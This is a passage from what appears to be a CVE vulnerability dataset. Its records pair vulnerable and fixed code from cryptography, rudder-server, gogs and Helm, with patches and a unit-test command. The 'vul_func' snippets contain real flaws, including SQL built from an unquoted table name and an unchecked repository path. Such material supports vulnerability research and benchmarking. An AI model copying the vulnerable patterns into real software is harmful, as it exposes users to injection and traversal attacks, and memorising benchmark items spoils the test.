self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n # At least we can set this higher than OpenSSL's default\n pkcs12_iter = 20000\n # mac_iter chosen for compatibility reasons, see:\n # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html\n # Did we mention how lousy PKCS12 encryption is?\n mac_iter = 1\n # MAC algorithm can only be set on OpenSSL 3.0.0+\n mac_alg = self._ffi.NULL\n password = encryption_algorithm.password\n elif (\n isinstance(\n encryption_algorithm, serialization._KeySerializationEncryption\n )\n and encryption_algorithm._format\n is serialization.PrivateFormat.PKCS12\n ):\n # Default to OpenSSL's defaults. 
Behavior will vary based on the\n # version of OpenSSL cryptography is compiled against.\n nid_cert = 0\n nid_key = 0\n # Use the default iters we use in best available\n pkcs12_iter = 20000\n # See the Best Available comment for why this is 1\n mac_iter = 1\n password = encryption_algorithm.password\n keycertalg = encryption_algorithm._key_cert_algorithm\n if keycertalg is PBES.PBESv1SHA1And3KeyTripleDESCBC:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n elif keycertalg is PBES.PBESv2SHA256AndAES256CBC:\n if not rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n raise UnsupportedAlgorithm(\n \"PBESv2 is not supported by this version of OpenSSL\"\n )\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n assert keycertalg is None\n # We use OpenSSL's defaults\n\n if encryption_algorithm._hmac_hash is not None:\n if not self._lib.Cryptography_HAS_PKCS12_SET_MAC:\n raise UnsupportedAlgorithm(\n \"Setting MAC algorithm is not supported by this \"\n \"version of OpenSSL.\"\n )\n mac_alg = self._evp_md_non_null_from_algorithm(\n encryption_algorithm._hmac_hash\n )\n self.openssl_assert(mac_alg != self._ffi.NULL)\n else:\n mac_alg = self._ffi.NULL\n\n if encryption_algorithm._kdf_rounds is not None:\n pkcs12_iter = encryption_algorithm._kdf_rounds\n\n else:\n raise ValueError(\"Unsupported key encryption type\")\n\n if cas is None or len(cas) == 0:\n sk_x509 = self._ffi.NULL\n else:\n sk_x509 = self._lib.sk_X509_new_null()\n sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free)\n\n # This list is to keep the x509 values alive until end of function\n ossl_cas = []\n for ca in cas:\n if isinstance(ca, PKCS12Certificate):\n ca_alias = ca.friendly_name\n ossl_ca = self._cert2ossl(ca.certificate)\n if ca_alias is None:\n res = self._lib.X509_alias_set1(\n ossl_ca, self._ffi.NULL, -1\n )\n else:\n res = self._lib.X509_alias_set1(\n ossl_ca, ca_alias, len(ca_alias)\n )\n self.openssl_assert(res == 1)\n else:\n ossl_ca = self._cert2ossl(ca)\n ossl_cas.append(ossl_ca)\n res = self._lib.sk_X509_push(sk_x509, ossl_ca)\n backend.openssl_assert(res >= 1)\n\n with self._zeroed_null_terminated_buf(password) as password_buf:\n with self._zeroed_null_terminated_buf(name) as name_buf:\n ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL\n ossl_pkey = (\n self._key2ossl(key) if key is not None else self._ffi.NULL\n )\n\n p12 = self._lib.PKCS12_create(\n password_buf,\n name_buf,\n ossl_pkey,\n ossl_cert,\n sk_x509,\n nid_key,\n nid_cert,\n pkcs12_iter,\n mac_iter,\n 0,\n )\n\n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n and mac_alg != self._ffi.NULL\n ):\n self._lib.PKCS12_set_mac(\n p12,\n password_buf,\n -1,\n self._ffi.NULL,\n 0,\n mac_iter,\n mac_alg,\n )\n\n self.openssl_assert(p12 != self._ffi.NULL)\n p12 = self._ffi.gc(p12, self._lib.PKCS12_free)\n\n bio = self._create_mem_bio_gc()\n res = self._lib.i2d_PKCS12_bio(bio, p12)\n self.openssl_assert(res > 0)\n return self._read_mem_bio(bio)"}], "fix_func": [{"id": "fix_py_427_1", "commit": "97d231672763cdb5959a3b191e692a362f1b9e55", "file_path": "src/cryptography/hazmat/backends/openssl/backend.py", "start_line": 491, "end_line": 656, "snippet": " def serialize_key_and_certificates_to_pkcs12(\n self,\n name: bytes | None,\n key: PKCS12PrivateKeyTypes | None,\n cert: x509.Certificate | None,\n cas: list[_PKCS12CATypes] | None,\n encryption_algorithm: serialization.KeySerializationEncryption,\n ) -> bytes:\n password = None\n if name 
is not None:\n utils._check_bytes(\"name\", name)\n\n if isinstance(encryption_algorithm, serialization.NoEncryption):\n nid_cert = -1\n nid_key = -1\n pkcs12_iter = 0\n mac_iter = 0\n mac_alg = self._ffi.NULL\n elif isinstance(\n encryption_algorithm, serialization.BestAvailableEncryption\n ):\n # PKCS12 encryption is hopeless trash and can never be fixed.\n # OpenSSL 3 supports PBESv2, but Libre and Boring do not, so\n # we use PBESv1 with 3DES on the older paths.\n if rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n # At least we can set this higher than OpenSSL's default\n pkcs12_iter = 20000\n # mac_iter chosen for compatibility reasons, see:\n # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html\n # Did we mention how lousy PKCS12 encryption is?\n mac_iter = 1\n # MAC algorithm can only be set on OpenSSL 3.0.0+\n mac_alg = self._ffi.NULL\n password = encryption_algorithm.password\n elif (\n isinstance(\n encryption_algorithm, serialization._KeySerializationEncryption\n )\n and encryption_algorithm._format\n is serialization.PrivateFormat.PKCS12\n ):\n # Default to OpenSSL's defaults. Behavior will vary based on the\n # version of OpenSSL cryptography is compiled against.\n nid_cert = 0\n nid_key = 0\n # Use the default iters we use in best available\n pkcs12_iter = 20000\n # See the Best Available comment for why this is 1\n mac_iter = 1\n password = encryption_algorithm.password\n keycertalg = encryption_algorithm._key_cert_algorithm\n if keycertalg is PBES.PBESv1SHA1And3KeyTripleDESCBC:\n nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC\n elif keycertalg is PBES.PBESv2SHA256AndAES256CBC:\n if not rust_openssl.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:\n raise UnsupportedAlgorithm(\n \"PBESv2 is not supported by this version of OpenSSL\"\n )\n nid_cert = self._lib.NID_aes_256_cbc\n nid_key = self._lib.NID_aes_256_cbc\n else:\n assert keycertalg is None\n # We use OpenSSL's defaults\n\n if encryption_algorithm._hmac_hash is not None:\n if not self._lib.Cryptography_HAS_PKCS12_SET_MAC:\n raise UnsupportedAlgorithm(\n \"Setting MAC algorithm is not supported by this \"\n \"version of OpenSSL.\"\n )\n mac_alg = self._evp_md_non_null_from_algorithm(\n encryption_algorithm._hmac_hash\n )\n self.openssl_assert(mac_alg != self._ffi.NULL)\n else:\n mac_alg = self._ffi.NULL\n\n if encryption_algorithm._kdf_rounds is not None:\n pkcs12_iter = encryption_algorithm._kdf_rounds\n\n else:\n raise ValueError(\"Unsupported key encryption type\")\n\n if cas is None or len(cas) == 0:\n sk_x509 = self._ffi.NULL\n else:\n sk_x509 = self._lib.sk_X509_new_null()\n sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free)\n\n # This list is to keep the x509 values alive until end of function\n ossl_cas = []\n for ca in cas:\n if isinstance(ca, PKCS12Certificate):\n ca_alias = ca.friendly_name\n ossl_ca = self._cert2ossl(ca.certificate)\n if ca_alias is None:\n res = self._lib.X509_alias_set1(\n ossl_ca, self._ffi.NULL, -1\n )\n else:\n res = self._lib.X509_alias_set1(\n ossl_ca, ca_alias, len(ca_alias)\n )\n self.openssl_assert(res == 1)\n else:\n ossl_ca = self._cert2ossl(ca)\n ossl_cas.append(ossl_ca)\n res = self._lib.sk_X509_push(sk_x509, ossl_ca)\n backend.openssl_assert(res >= 1)\n\n with 
self._zeroed_null_terminated_buf(password) as password_buf:\n with self._zeroed_null_terminated_buf(name) as name_buf:\n ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL\n ossl_pkey = (\n self._key2ossl(key) if key is not None else self._ffi.NULL\n )\n\n p12 = self._lib.PKCS12_create(\n password_buf,\n name_buf,\n ossl_pkey,\n ossl_cert,\n sk_x509,\n nid_key,\n nid_cert,\n pkcs12_iter,\n mac_iter,\n 0,\n )\n if p12 == self._ffi.NULL:\n errors = self._consume_errors()\n raise ValueError(\n (\n \"Failed to create PKCS12 (does the key match the \"\n \"certificate?)\"\n ),\n errors,\n )\n\n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n and mac_alg != self._ffi.NULL\n ):\n self._lib.PKCS12_set_mac(\n p12,\n password_buf,\n -1,\n self._ffi.NULL,\n 0,\n mac_iter,\n mac_alg,\n )\n\n self.openssl_assert(p12 != self._ffi.NULL)\n p12 = self._ffi.gc(p12, self._lib.PKCS12_free)\n\n bio = self._create_mem_bio_gc()\n res = self._lib.i2d_PKCS12_bio(bio, p12)\n self.openssl_assert(res > 0)\n return self._read_mem_bio(bio)"}], "vul_patch": "--- a/src/cryptography/hazmat/backends/openssl/backend.py\n+++ b/src/cryptography/hazmat/backends/openssl/backend.py\n@@ -133,6 +133,15 @@\n mac_iter,\n 0,\n )\n+ if p12 == self._ffi.NULL:\n+ errors = self._consume_errors()\n+ raise ValueError(\n+ (\n+ \"Failed to create PKCS12 (does the key match the \"\n+ \"certificate?)\"\n+ ),\n+ errors,\n+ )\n \n if (\n self._lib.Cryptography_HAS_PKCS12_SET_MAC\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-30625", "cve_description": "rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
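The patch for this record (see the getSqlSafeTablename helper in its fix_func below) neutralizes the attacker-influenced table name by double-quoting the identifier and doubling any embedded quotes. A minimal sketch of that quoting idea in Go; the failed_keys prefix stands in for the real failedKeysTablePrefix and is illustrative only.

```go
package main

import (
	"fmt"
	"strings"
)

// quoteIdentifier mirrors the patch's approach: wrap the generated table
// name in double quotes and escape embedded quotes by doubling them, so
// an attacker-controlled taskRunID cannot break out of the identifier.
func quoteIdentifier(taskRunID string) string {
	raw := fmt.Sprintf("failed_keys_%s", taskRunID) // illustrative prefix
	return `"` + strings.ReplaceAll(raw, `"`, `""`) + `"`
}

func main() {
	// Before the fix, an ID like this could terminate the statement and
	// append arbitrary SQL; quoted, it is merely an odd table name.
	malicious := `x"; DROP TABLE users; --`
	fmt.Printf("DROP TABLE IF EXISTS %s\n", quoteIdentifier(malicious))
}
```

Quoting the identifier this way confines the taskRunID to a single table name, so statements such as DROP TABLE IF EXISTS can no longer be extended with injected SQL.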
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/rudderlabs/rudder-server", "patch_url": ["https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e", "https://github.com/rudderlabs/rudder-server/commit/9c009d9775abc99e72fc470f4c4c8e8f1775e82a", "https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30"], "programing_language": "Go", "vul_func": [{"id": "vul_go_28_1", "commit": "725e9e7", "file_path": "router/failed-events-manager.go", "start_line": 91, "end_line": 103, "snippet": "func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\t// Drop table\n\ttable := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)\n\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n\t_, err := fem.dbHandle.Exec(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n\t}\n}"}], "fix_func": [{"id": "fix_go_28_1", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 53, "end_line": 89, "snippet": "func (*FailedEventsManagerT) SaveFailedRecordIDs(taskRunIDFailedEventsMap map[string][]*FailedEventRowT, txn *sql.Tx) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\tfor taskRunID, failedEvents := range taskRunIDFailedEventsMap {\n\t\ttable := getSqlSafeTablename(taskRunID)\n\t\tsqlStatement := fmt.Sprintf(`CREATE TABLE IF NOT EXISTS %s (\n\t\tdestination_id TEXT NOT NULL,\n\t\trecord_id JSONB NOT NULL,\n\t\tcreated_at TIMESTAMP NOT NULL);`, table)\n\t\t_, err := txn.Exec(sqlStatement)\n\t\tif err != nil {\n\t\t\t_ = txn.Rollback()\n\t\t\tpanic(err)\n\t\t}\n\t\tinsertQuery := fmt.Sprintf(`INSERT INTO %s VALUES($1, $2, $3);`, table)\n\t\tstmt, err := txn.Prepare(insertQuery)\n\t\tif err != nil {\n\t\t\t_ = txn.Rollback()\n\t\t\tpanic(err)\n\t\t}\n\t\tcreatedAt := time.Now()\n\t\tfor _, failedEvent := range failedEvents {\n\t\t\tif len(failedEvent.RecordID) == 0 || !json.Valid(failedEvent.RecordID) {\n\t\t\t\tpkgLogger.Infof(\"skipped adding invalid recordId: %s, to failed keys table: %s\", failedEvent.RecordID, table)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t_, err = stmt.Exec(failedEvent.DestinationID, failedEvent.RecordID, createdAt)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}\n\n\t\tstmt.Close()\n\t}\n}"}, {"id": "fix_go_28_2", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 91, "end_line": 103, "snippet": "func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\t// Drop table\n\ttable := getSqlSafeTablename(taskRunID)\n\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n\t_, err := fem.dbHandle.Exec(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n\t}\n}"}, {"id": "fix_go_28_3", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 105, "end_line": 134, "snippet": "func (fem *FailedEventsManagerT) FetchFailedRecordIDs(taskRunID string) []*FailedEventRowT {\n\tif !failedKeysEnabled {\n\t\treturn []*FailedEventRowT{}\n\t}\n\n\tfailedEvents := make([]*FailedEventRowT, 0)\n\n\tvar rows *sql.Rows\n\tvar err error\n\ttable := getSqlSafeTablename(taskRunID)\n\tsqlStatement := fmt.Sprintf(`SELECT 
%[1]s.destination_id, %[1]s.record_id\n FROM %[1]s `, table)\n\trows, err = fem.dbHandle.Query(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to fetch from table %s with error: %v\", taskRunID, err)\n\t\treturn failedEvents\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\t\tvar failedEvent FailedEventRowT\n\t\terr := rows.Scan(&failedEvent.DestinationID, &failedEvent.RecordID)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tfailedEvents = append(failedEvents, &failedEvent)\n\t}\n\n\treturn failedEvents\n}"}, {"id": "fix_go_28_4", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 192, "end_line": 194, "snippet": "func getSqlSafeTablename(taskRunID string) string {\n\treturn `\"` + strings.ReplaceAll(fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID), `\"`, `\"\"`) + `\"`\n}"}], "vul_patch": "--- a/router/failed-events-manager.go\n+++ b/router/failed-events-manager.go\n@@ -1,13 +1,37 @@\n-func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n+func (*FailedEventsManagerT) SaveFailedRecordIDs(taskRunIDFailedEventsMap map[string][]*FailedEventRowT, txn *sql.Tx) {\n \tif !failedKeysEnabled {\n \t\treturn\n \t}\n \n-\t// Drop table\n-\ttable := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)\n-\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n-\t_, err := fem.dbHandle.Exec(sqlStatement)\n-\tif err != nil {\n-\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n+\tfor taskRunID, failedEvents := range taskRunIDFailedEventsMap {\n+\t\ttable := getSqlSafeTablename(taskRunID)\n+\t\tsqlStatement := fmt.Sprintf(`CREATE TABLE IF NOT EXISTS %s (\n+\t\tdestination_id TEXT NOT NULL,\n+\t\trecord_id JSONB NOT NULL,\n+\t\tcreated_at TIMESTAMP NOT NULL);`, table)\n+\t\t_, err := txn.Exec(sqlStatement)\n+\t\tif err != nil {\n+\t\t\t_ = txn.Rollback()\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tinsertQuery := fmt.Sprintf(`INSERT INTO %s VALUES($1, $2, $3);`, table)\n+\t\tstmt, err := txn.Prepare(insertQuery)\n+\t\tif err != nil {\n+\t\t\t_ = txn.Rollback()\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tcreatedAt := time.Now()\n+\t\tfor _, failedEvent := range failedEvents {\n+\t\t\tif len(failedEvent.RecordID) == 0 || !json.Valid(failedEvent.RecordID) {\n+\t\t\t\tpkgLogger.Infof(\"skipped adding invalid recordId: %s, to failed keys table: %s\", failedEvent.RecordID, table)\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t\t_, err = stmt.Exec(failedEvent.DestinationID, failedEvent.RecordID, createdAt)\n+\t\t\tif err != nil {\n+\t\t\t\tpanic(err)\n+\t\t\t}\n+\t\t}\n+\n+\t\tstmt.Close()\n \t}\n }\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,13 @@\n+func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n+\tif !failedKeysEnabled {\n+\t\treturn\n+\t}\n+\n+\t// Drop table\n+\ttable := getSqlSafeTablename(taskRunID)\n+\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n+\t_, err := fem.dbHandle.Exec(sqlStatement)\n+\tif err != nil {\n+\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n+\t}\n+}\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,30 @@\n+func (fem *FailedEventsManagerT) FetchFailedRecordIDs(taskRunID string) []*FailedEventRowT {\n+\tif !failedKeysEnabled {\n+\t\treturn []*FailedEventRowT{}\n+\t}\n+\n+\tfailedEvents := make([]*FailedEventRowT, 0)\n+\n+\tvar rows *sql.Rows\n+\tvar err error\n+\ttable := getSqlSafeTablename(taskRunID)\n+\tsqlStatement := fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id\n+ 
FROM %[1]s `, table)\n+\trows, err = fem.dbHandle.Query(sqlStatement)\n+\tif err != nil {\n+\t\tpkgLogger.Errorf(\"Failed to fetch from table %s with error: %v\", taskRunID, err)\n+\t\treturn failedEvents\n+\t}\n+\tdefer rows.Close()\n+\n+\tfor rows.Next() {\n+\t\tvar failedEvent FailedEventRowT\n+\t\terr := rows.Scan(&failedEvent.DestinationID, &failedEvent.RecordID)\n+\t\tif err != nil {\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tfailedEvents = append(failedEvents, &failedEvent)\n+\t}\n+\n+\treturn failedEvents\n+}\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,3 @@\n+func getSqlSafeTablename(taskRunID string) string {\n+\treturn `\"` + strings.ReplaceAll(fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID), `\"`, `\"\"`) + `\"`\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30625:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/rudder-server\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestDropFailedRecordIDs$ github.com/rudderlabs/rudder-server/router\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-1993", "cve_description": "Path Traversal in GitHub repository gogs/gogs prior to 0.12.9.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/9bf748b6c4c9a17d3aa77f6b9abcfae65451febf"], "programing_language": "Go", "vul_func": [{"id": "vul_go_105_1", "commit": "e370657", "file_path": "internal/route/repo/http.go", "start_line": 394, "end_line": 439, "snippet": "func HTTP(c *HTTPContext) {\n\tfor _, route := range routes {\n\t\treqPath := strings.ToLower(c.Req.URL.Path)\n\t\tm := route.re.FindStringSubmatch(reqPath)\n\t\tif m == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// We perform check here because route matched in cmd/web.go is wider than needed,\n\t\t// but we only want to output this message only if user is really trying to access\n\t\t// Git HTTP endpoints.\n\t\tif conf.Repository.DisableHTTPGit {\n\t\t\tc.Error(http.StatusForbidden, \"Interacting with repositories by HTTP protocol is disabled\")\n\t\t\treturn\n\t\t}\n\n\t\tif route.method != c.Req.Method {\n\t\t\tc.NotFound()\n\t\t\treturn\n\t\t}\n\n\t\tfile := strings.TrimPrefix(reqPath, m[1]+\"/\")\n\t\tdir, err := getGitRepoPath(m[1])\n\t\tif err != nil {\n\t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n\t\t\tc.NotFound()\n\t\t\treturn\n\t\t}\n\n\t\troute.handler(serviceHandler{\n\t\t\tw: c.Resp,\n\t\t\tr: c.Req.Request,\n\t\t\tdir: dir,\n\t\t\tfile: file,\n\n\t\t\tauthUser: c.AuthUser,\n\t\t\townerName: c.OwnerName,\n\t\t\townerSalt: c.OwnerSalt,\n\t\t\trepoID: c.RepoID,\n\t\t\trepoName: c.RepoName,\n\t\t})\n\t\treturn\n\t}\n\n\tc.NotFound()\n}"}], "fix_func": [{"id": "fix_go_105_1", "commit": "9bf748b", "file_path": "internal/route/repo/http.go", "start_line": 395, "end_line": 446, "snippet": "func HTTP(c *HTTPContext) 
{\n\tfor _, route := range routes {\n\t\treqPath := strings.ToLower(c.Req.URL.Path)\n\t\tm := route.re.FindStringSubmatch(reqPath)\n\t\tif m == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// We perform check here because route matched in cmd/web.go is wider than needed,\n\t\t// but we only want to output this message only if user is really trying to access\n\t\t// Git HTTP endpoints.\n\t\tif conf.Repository.DisableHTTPGit {\n\t\t\tc.Error(http.StatusForbidden, \"Interacting with repositories by HTTP protocol is disabled\")\n\t\t\treturn\n\t\t}\n\n\t\tif route.method != c.Req.Method {\n\t\t\tc.Error(http.StatusNotFound)\n\t\t\treturn\n\t\t}\n\n\t\tcleaned := pathutil.Clean(m[1])\n\t\tif m[1] != \"/\"+cleaned {\n\t\t\tc.Error(http.StatusBadRequest, \"Request path contains suspicious characters\")\n\t\t\treturn\n\t\t}\n\n\t\tfile := strings.TrimPrefix(reqPath, cleaned)\n\t\tdir, err := getGitRepoPath(cleaned)\n\t\tif err != nil {\n\t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n\t\t\tc.Error(http.StatusNotFound)\n\t\t\treturn\n\t\t}\n\n\t\troute.handler(serviceHandler{\n\t\t\tw: c.Resp,\n\t\t\tr: c.Req.Request,\n\t\t\tdir: dir,\n\t\t\tfile: file,\n\n\t\t\tauthUser: c.AuthUser,\n\t\t\townerName: c.OwnerName,\n\t\t\townerSalt: c.OwnerSalt,\n\t\t\trepoID: c.RepoID,\n\t\t\trepoName: c.RepoName,\n\t\t})\n\t\treturn\n\t}\n\n\tc.Error(http.StatusNotFound)\n}"}], "vul_patch": "--- a/internal/route/repo/http.go\n+++ b/internal/route/repo/http.go\n@@ -15,15 +15,21 @@\n \t\t}\n \n \t\tif route.method != c.Req.Method {\n-\t\t\tc.NotFound()\n+\t\t\tc.Error(http.StatusNotFound)\n \t\t\treturn\n \t\t}\n \n-\t\tfile := strings.TrimPrefix(reqPath, m[1]+\"/\")\n-\t\tdir, err := getGitRepoPath(m[1])\n+\t\tcleaned := pathutil.Clean(m[1])\n+\t\tif m[1] != \"/\"+cleaned {\n+\t\t\tc.Error(http.StatusBadRequest, \"Request path contains suspicious characters\")\n+\t\t\treturn\n+\t\t}\n+\n+\t\tfile := strings.TrimPrefix(reqPath, cleaned)\n+\t\tdir, err := getGitRepoPath(cleaned)\n \t\tif err != nil {\n \t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n-\t\t\tc.NotFound()\n+\t\t\tc.Error(http.StatusNotFound)\n \t\t\treturn\n \t\t}\n \n@@ -42,5 +48,5 @@\n \t\treturn\n \t}\n \n-\tc.NotFound()\n+\tc.Error(http.StatusNotFound)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-25165", "cve_description": "Helm is a tool that streamlines installing and managing Kubernetes applications.`getHostByName` is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with `helm install|upgrade|template` or when the Helm SDK is used to render a chart. Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject `getHostByName` into a chart in order to disclose values to a malicious DNS server. The issue has been fixed in Helm 3.11.1. 
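The fix shown in this record's fix_func defangs getHostByName by overriding it in the template function map with a stub that returns an empty string unless DNS lookups are explicitly enabled (Engine.EnableDNS, surfaced as the --enable-dns flag). A self-contained sketch of that override pattern using Go's text/template; the template body and the stub IP address are invented for illustration.

```go
package main

import (
	"os"
	"text/template"
)

func main() {
	enableDNS := false // mirrors Helm's EnableDNS field / --enable-dns flag

	funcs := template.FuncMap{
		// Stand-in for sprig's real getHostByName, which performs a DNS
		// lookup; a malicious chart can leak values through that lookup.
		"getHostByName": func(name string) string { return "203.0.113.1" },
	}
	if !enableDNS {
		// With DNS disabled, rendering proceeds but no query is ever made,
		// so nothing can be exfiltrated to an attacker-controlled resolver.
		funcs["getHostByName"] = func(name string) string { return "" }
	}

	tpl := template.Must(template.New("chart").Funcs(funcs).Parse(
		`host: {{ getHostByName "leaked-secret.attacker.example" }}`))
	_ = tpl.Execute(os.Stdout, nil) // prints "host: " when lookups are off
}
```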
Prior to using a chart with Helm verify the `getHostByName` function is not being used in a template to disclose any information you do not want passed to DNS servers.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_49_1", "commit": "5bf273d81ba7da1816a55983fae6a6cf4ca29af2", "file_path": "pkg/engine/engine.go", "start_line": 37, "end_line": 45, "snippet": "type Engine struct {\n\t// If strict is enabled, template rendering will fail if a template references\n\t// a value that was not passed in.\n\tStrict bool\n\t// In LintMode, some 'required' template values may be missing, so don't fail\n\tLintMode bool\n\t// the rest config to connect to the kubernetes api\n\tconfig *rest.Config\n}"}, {"id": "vul_go_49_2", "commit": "5bf273d81ba7da1816a55983fae6a6cf4ca29af2", "file_path": "pkg/engine/engine.go", "start_line": 107, "end_line": 193, "snippet": "func (e Engine) initFunMap(t *template.Template, referenceTpls map[string]renderable) {\n\tfuncMap := funcMap()\n\tincludedNames := make(map[string]int)\n\n\t// Add the 'include' function here so we can close over t.\n\tfuncMap[\"include\"] = func(name string, data interface{}) (string, error) {\n\t\tvar buf strings.Builder\n\t\tif v, ok := includedNames[name]; ok {\n\t\t\tif v > recursionMaxNums {\n\t\t\t\treturn \"\", errors.Wrapf(fmt.Errorf(\"unable to execute template\"), \"rendering template has a nested reference name: %s\", name)\n\t\t\t}\n\t\t\tincludedNames[name]++\n\t\t} else {\n\t\t\tincludedNames[name] = 1\n\t\t}\n\t\terr := t.ExecuteTemplate(&buf, name, data)\n\t\tincludedNames[name]--\n\t\treturn buf.String(), err\n\t}\n\n\t// Add the 'tpl' function here\n\tfuncMap[\"tpl\"] = func(tpl string, vals chartutil.Values) (string, error) {\n\t\tbasePath, err := vals.PathValue(\"Template.BasePath\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Basepath from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplateName, err := vals.PathValue(\"Template.Name\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Name from values inside tpl function: %s\", 